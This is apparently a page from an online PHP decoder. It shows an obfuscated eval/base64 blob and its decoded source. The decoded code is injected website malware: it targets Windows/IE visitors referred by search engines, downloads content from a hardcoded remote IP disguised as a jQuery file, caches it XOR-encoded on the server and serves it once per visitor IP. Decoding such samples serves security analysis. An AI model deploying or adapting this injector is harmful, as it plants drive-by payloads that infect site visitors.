Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode('hVVbb9s2FH52gf4HJhBKKVFlu2vaop7WBIm2FV3iQnG2h8ATFJm02UikSlFL..

Decoded Output download

function frm_dl ($url) {
	if (function_exists('curl_init')) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$out = curl_exec ($ch);
		if (curl_errno($ch) !== 0) $out = false;
		curl_close ($ch);
	} else {$out = file_get_contents($url);}
	return trim($out);
}

function frm_crpt($in){
	$il=strlen($in);$o='';
	for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
	return $o;
}

function frm_seref(){
	$r = strtolower($_SERVER["HTTP_REFERER"]);
	$ses = array('google','bing','yahoo','ask','aol');
	foreach ($ses as $se)
		if(strpos($r, $se.'.')!=false) return true;
	return false;
}

function frm_getfrm()
{
	$dr=$_SERVER["DOCUMENT_ROOT"];
	$f = $dr.'/sess_'.md5('frm_frame');
	if(!file_exists($f) || time() - filemtime($f) > 60*5)
	{
		$dlc = frm_dl('http://151.248.123.170/nc/gnc.php?ver=jquery.latest.min.js');
		if ($dlc){
			if ($fp = fopen($f, 'w')){
				fwrite($fp, frm_crpt($dlc));
				fclose($fp);
			}
			else
				return $dlc;
		}
		else
			@unlink($f);
	}
	$fc = @file_get_contents($f);
	return ($fc)?frm_crpt($fc):false;
}

if (!isset($frmDs)){
	global $frmDs;
	$frmDs = 1;

	
	$ua = $_SERVER['HTTP_USER_AGENT'];
	if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_seref()){
		error_reporting(0);
		
		$ip=$_SERVER["REMOTE_ADDR"]; 
		$dr=$_SERVER["DOCUMENT_ROOT"];
		
		$dbf=$dr.'/sess_'.md5(date('m.d.y'));
		$odbf = $dr.'/sess_'.md5(date('m.d.y',time()-86400));
		if (file_exists($odbf)) @unlink($odbf);

		if(!isset($_COOKIE['__utmfr']) && strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false && $nfc=frm_getfrm() ) {
			setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');
			print($nfc);
			if ($fp = @fopen($dbf , 'a')){fputs($fp , frm_crpt($ip.'|')); fclose($fp);}
		}
	}
}

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode('hVVbb9s2FH52gf4HJhBKKVFlu2vaop7WBIm2FV3iQnG2h8ATFJm02UikSlFLg8b/veeQsq2gAfYQ0Tz3y/cxvJWFEUoSrqtsURLfa3UZkO/Pnw0EJz7v1Bn7JhrT+LQAdSakMDRwVgOvWJGYbOUuwAQ1VtYwo2qQFquQnF6lf00/z7I0mV2lF7P05OLy9yQNydjZe6o1m1DsGysIejkV1uLkWktl5WQvjskoIJ0Xz8uG7dIWpWrYLsCaMFCT7xtjUbJsyUxWKGmYhMZc1Wsw1cy0WhKjReWjOfqD/Pkz3h9VobEpIQOcgSfKuDG6ZNKKJp6KKcW0XGmoQUDG0YTA+St8Svx1eIiFRzGYX3tiTv4l9MB6dNk99WTWhmnGfZdTQ1RIalSp7pj2vewySf9O0uv9P2ezzzBimGyS7s9t+17DGjDPtc7vfbpUalkyGtIbIZdw3OcrpeDMm1v8qpIGXfEsh+X61jtvCJyBW4YPiWsFU9MhSiMa0WAvtisIyHaALet1tNnPz03BHuDwIbTta6HjXS9n09Or8+QCIDOdzvbnthcOnYBVRIdQV5PRqFoc+RQjcZ1XzBUPNe7ZLXfA9XhAHh6IERXzA/LSIqCyN9T8Rt6MDo6wOQfpRVkgSiwlfLoypn4/HI6PxtGr1++i8atfovHb0VAWw6UsonpVf/iP6fjL15bp+6jMDWtMVAkZfWnoDr0Y0y6uu/IaM6gaMcNDQu+AUE494HdaGCysDntYQ38XDiwsvNGik6ztFzHuDDYwAidrYPVb9XErSyFvsXVLDjtV7Pj4CWI4my4gXIvgw64ouL1/tFnsbU80wHpQ6uqscV0tS3WTl8SJ3BbxF6QcT9BtgKI2x81udk8tjq/glp38ARCg80n3KNWaLbMqN8XKp8N/hFyou2ZIAYltHpAXL8gj/fnlx+RhWjOd9016ZHJTh3dF6UyzWmkDrPBHbrAWDaLuITJNzqezJDs5OwNyTYiDy/9A1oVZ3PD4J9wuAC4+raJFdE+DzTMIlk9hvG8bOiS/fPfm9WgU7GD2CPMYCJ7p7brt3c3bEqTbU3Y6nX76mFzTLGtNxTWd2xl1HN8u+ylw2AQhTCggcdw9wujrSV7EfXKT7r/FADIWSt0K6GSTLtS5XPjjcDyCVrrGDm1jB29DOuxINKi1kFAtRO4EOx4dd0TCwQGXcuQSr1sL35r0WSTqiD7gpEmfQ+sNR+Bv/QM='))) 

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 eeed1fdfa1c19d7763fd28336e6606de
Eval Count 1
Decode Time 87 ms